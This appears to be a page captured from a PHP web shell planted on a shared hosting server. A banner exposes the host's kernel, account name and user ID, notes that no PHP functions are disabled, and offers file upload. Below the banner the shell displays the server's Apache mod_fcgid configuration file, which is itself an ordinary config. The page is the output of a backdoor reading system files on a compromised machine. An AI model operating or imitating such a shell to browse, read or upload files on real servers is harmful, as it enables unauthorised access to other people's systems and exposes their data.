HEX
Server: Apache
System: Linux br1102.hostgator.com.br 5.14.0-687.17.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jun 22 07:21:26 EDT 2026 x86_64
User: rkcent87 (3754)
PHP: 8.3.32
Disabled: NONE
Upload Files
File: //etc/apache2/conf.d/fcgid.conf
# This is the Apache server configuration to configure mod_fcgid
#
# If you want to configure PHP with FastCGI (using mod_fcgid), then use
# the cPanel & WHM MultiPHP Manager page.
#
# For all other customizations, you can place them here.
#
# Documentation for mod_fcgid configuration options can be found here:
#    http://httpd.apache.org/mod_fcgid/mod/mod_fcgid.html

<IfModule fcgid_module>
    # Sane place to put sockets and shared memory file
    FcgidIPCDir /run/mod_fcgid
    FcgidProcessTableFile /run/mod_fcgid/fcgid_shm

    # Basic configuration settings
    FcgidMaxRequestLen 1073741824
    MaxRequestsPerProcess 500
</IfModule>